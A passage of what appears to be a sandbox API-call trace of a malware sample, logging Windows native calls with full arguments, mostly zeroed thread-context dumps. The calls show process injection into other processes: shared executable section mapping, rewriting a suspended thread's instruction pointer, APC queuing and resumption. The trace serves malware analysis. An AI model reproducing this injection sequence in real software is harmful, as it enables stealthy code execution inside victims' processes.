NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x3e60000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0153.391] NtGetContextThread (in: ThreadHandle=0x100, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x1, Ebx=0x58fb24, Edx=0x0, Ecx=0x0, Eax=0x48, Ebp=0x58fb70, Eip=0x778e014d, SegCs=0x23, EFlags=0x246, Esp=0x58fad4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0153.393] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0153.393] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0xe4200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0xb50000, SectionOffset=0x0, ViewSize=0x19e6b0*=0xe5000) returned 0x0 [0153.399] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0xe4200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x2d40000, SectionOffset=0x0, ViewSize=0x19e6ec*=0xe5000) returned 0x0 [0153.412] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xb50000) returned 0x0 [0153.424] NtClose (Handle=0x108) returned 0x0 [0153.424] NtSetContextThread (ThreadHandle=0x100, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x1, Ebx=0x58fb24, Edx=0x0, Ecx=0x0, Eax=0x48, Ebp=0x58fb70, Eip=0x2d91707, SegCs=0x23, EFlags=0x246, Esp=0x58fad4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0153.425] NtQueueApcThread (ThreadHandle=0x100, ApcRoutine=0x2d9170c, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0153.425] NtResumeThread (in: ThreadHandle=0x100, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0153.513] NtClose (Handle=0x104) returned 0x0 [0153.513] NtClose (Handle=0x100) returned 0x0 [0153.598] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xbc4, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x100) returned 0x0 [0153.598] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0153.598] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0153.598] NtReadVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0153.598] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0158.593] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xbc8) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0158.593] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0158.593] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x100, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x2300000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0158.599] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x36fb68, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x36fb10, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x36faf4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, 